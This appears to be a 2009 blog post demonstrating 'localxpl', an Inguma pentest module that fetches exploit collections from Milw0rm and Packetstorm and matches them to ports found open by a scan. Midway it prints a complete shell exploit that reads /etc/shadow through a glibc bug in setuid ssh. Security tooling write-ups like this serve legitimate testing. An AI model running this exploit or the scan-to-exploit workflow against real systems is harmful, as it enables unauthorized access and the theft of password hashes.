Actually the Inguma's development team is just two persons and the project is still young and lacks many features but one of them is even more necessary: exploits. Inguma itself requires lots of development so we can't spent much more time developing exploits but with this module I will try to solve this problem a little.
The new module, called 'localxpl' (local exploits), will allow Inguma to download and manage exploits from two important exploits repositories: Milw0rm an Packetstorm. Let's see it in action in order to see what and how can do this new module. The new module can be found under the category 'exploits' and once you type 'localxpl' you will enter into it's interface:
inguma> show exploits List of exploit modules ----------------------- (...) localxpl A Module to fetch and manage exploits from many sources (...) inguma> localxpl Exploits from Milw0rm not yet downloaded Exploits from Packetstorm not yet downloaded Actual remotedb selected: milw0rm LOCXPL>
We can see that it informs us that we haven't downloaded any exploit yet and that, by default, the repository to work with is milw0rm. To see the options we have just to type 'help':
LOCXPL> help Inguma's Local Exploit DDBB Help -------------------------------- remotedb Database to work with: milw0rm or packetstorm fetch Download exploits from remotedb help Show this help exit Exits the DDBB
As we have no local repository yet, the options shown are just a few: select the repository to get (milw0rm or packetstorm) and download the exploits from the selected repository. As we have no other choice with milw0rm selected, let's download the exploits with the command 'fetch' and see the new options:
LOCXPL> fetch Dir: /inguma/modules/exploits/ Downloading http://www.milw0rm.com/sploits/milw0rm.tar.bz2 Extracting files... Exploits successfully downloaded on Thu Jan 15 20:19:38 2009 Operation Complete
Now we know that exploits are going to be stored under directory exploits and that the download finished fine; the path to store the exploits can be modified easily on the source of the module. Type 'help' again to see the new options:
Inguma's Local Exploit DDBB Help -------------------------------- remotedb Database to work with: milw0rm or packetstorm fetch Download exploits from remotedb Manage Milw0rm DDBB commands ---------------------------- list Shows list of local exploits. VERY VERBOSE search Search exploits; use the 'tag' variable Example: to search for windows exploits 'tag Windows' rport Shows exploits afecting a remote port Define the port using command 'port 22' Port must be numeric: 22 intead of SSH correlate Searches the DDBB for all exploits matching rport for all the ports of a scaned machine. Specify target machine with 'target 192.168.0.1' Be sure to scan the machine before! show Shows selected exploit source code Select exploit using xplpath command: 'xplpath path/to/exploit' help Show this help exit Exits the DDBB
Now that we have some exploits downloaded we have some more operations to perform with them. For example we can list all the exploits downloaded from milw0rm just by typing 'list' but this will output lots of them so... Also we can now search all the exploits for a given keywords just by setting it with the commands 'tag' and 'search':
LOCXPL> tag openssh New search tag: openssh LOCXPL> search Searching milw0rm local DDBB for tag: openssh ./platforms/linux/local/258.sh glibc-2.2 and openssh-2.3.0p1 exploits glibc >= 2.1.9x
We got one match for an exploit related to 'OpenSSH' and now we can get more information just by displaying its contents; just set the path to th exploit using the command 'xplpath' and the path you got from the search results and type show:
LOCXPL> xplpath ./modules/exploits/milw0rm/platforms/linux/local/258.sh ./modules/exploits/milw0rm/platforms/linux/local/258.sh set to show. LOCXPL> show # Charles Stevenson# glibc-2.2 and openssh-2.3.0p1 (Debian 2.3 , Redhat 7.0) # This exploits is for glibc >= 2.1.9x. # (****krochos@linuxmail.org****) # Edit this if you have a problem with path ssh=/usr/bin/ssh traceroute=/usr/sbin/traceroute FILE=/etc/shadow # File to read ############################################################################### echo "$ssh" echo "[*] Checking permisions..." if [ ! -u $ssh ]; then echo "$ssh is NOT setuid on this system or does not exist at all!" if [ ! -u $traceroute ]; then echo "$traceroute is NOT setuid on this system or does not exist at all!" exit 0 fi fi export RESOLV_HOST_CONF=$FILE echo "[*] Glibc bug found by Charles Stevenson " echo "[*] krochos@linuxmail.org" sleep 1 echo "[*] export RESOLV_HOST_CONF=/etc/shadow" ssh lt 2>/tmp/.resolv cat /tmp/.resolv | cut -d"\`" -f5,2 | awk -F"\'" '{print $1} ' # milw0rm.com [2001-01-25]
Another option is to list all the exploits affecting a given remote port using the command 'rport' after specifying the remote port with the command 'port' as explained in the help; the command 'correlate' will be shown late on this post.
Now that we have seen what we can do with the Milw0rm repository let's see what can we do with Packetstorm; first we switch to packetstorm with the command 'remotedb' and type help:
LOCXPL> remotedb packetstorm New remotedb selected: packetstorm LOCXPL> help Inguma's Local Exploit DDBB Help -------------------------------- remotedb Database to work with: milw0rm or packetstorm fetch Download exploits from remotedb years A space separated list of years to fetch Example: 'years 06 07 08' help Show this help exit Exits the DDBB
As with milw0rm, until we get the exploits we have few choices. But now we have one difference, packetstorm classify it's exploits by year so we can specify the years we want to fetch with the command 'years'; by default exploits from the years 2007/08 will be downloaded.
LOCXPL> years 08 Years: ['08'] LOCXPL> fetch Dir: /inguma/modules/exploits/packetstorm/ Start: 2008 Downloading: http://packetstormsecurity.org/0812-exploits/2008-exploits.tgz ... Done. Extracting files... Done: 2008 Exploits successfully downloaded on Thu Jan 15 20:28:44 2009
Almost the same as with milw0rm till now. From now on if we fetch exploits from milw0rm or packetstorm they will be updated, and if we specify 'years 07 08' and fetch again only the exploits of year 2007 will be downloaded. So let's see the new options we have now for the packetstorm repository:
Inguma's Local Exploit DDBB Help -------------------------------- remotedb Database to work with: milw0rm or packetstorm fetch Download exploits from remotedb years A space separated list of years to fetch Example: 'years 06 07 08' Manage Packetstorm DDBB commands -------------------------------- list Shows list of local exploits. VERY VERBOSE Also navigate the exploits listing going with your browser to, for example: /inguma/modules/exploits/packetstorm/08-exploits/0801-exploits/index.html search Search exploits; use the 'tag' variable Example: to search for windows exploits Example: 'tag Windows Vista' Optionaly append a year to search only on exploits of this year Example: 'year 08' show Shows selected exploit source code Select exploit using xplpath command: 'xplpath path/to/exploit' help Show this help exit Exits the DDBB
As we can see options are almost the same that we have with milw0rm but here we can't search by port; if look at the help of the command list we can see that we can browse the exploits of this repository by opening the file index.html that exists on each directory of the repository, just change year and month on the path.
And the last command we are going to see is the 'correlate' that we can find in the milw0rm help. With this command we can automatically search all the exploits that may affect all the ports that have been reported open by the port scans. So, the first thing we need to perform is a port scan:
inguma> target = '192.168.0.1' inguma> tcpscan Scanning port 17004 (417/417) Open ports ---------- Port 1720 is open Port 23/telnet is open
Once we get the open ports for this target we enter into the 'localxpl' interface to correlate the results with the existing exploits. As we already have downloaded the exploits we are now informed with the dates of the downloads so we can decide if we need to update.
inguma> localxpl Last Milw0rm DDBB update: Thu Jan 15 20:19:38 2009 Last Packetstorm DDBB update: Thu Jan 15 20:28:44 2009 Actual remotedb selected: milw0rm
Now we just need to specify the target we have scanned and we want to correlate and launch the command 'correlate':
LOCXPL> target 192.168.0.1 Target set for correlation: 192.168.0.1 LOCXPL> correlate Searching exploits available on milw0rm DDBB for port TCP/23 /inguma/modules/exploits/milw0rm/rport/23/346.c /inguma/modules/exploits/milw0rm/rport/23/3293.sh /inguma/modules/exploits/milw0rm/rport/23/254.c /inguma/modules/exploits/milw0rm/rport/23/621.c /inguma/modules/exploits/milw0rm/rport/23/89.c /inguma/modules/exploits/milw0rm/rport/23/409.c Searching exploits available on milw0rm DDBB for port TCP/1720 No exploits found for port TCP/1720
Ok, this is not enough to get accurate results but it's a starting point so, once I improve the scanning modules, to get and store also information about the services listening on each port that's all we have.
So that's all folks; I hope that I will improve this module soon and also get new interesting ones. To finish, a tip for my next module: PIG. ;)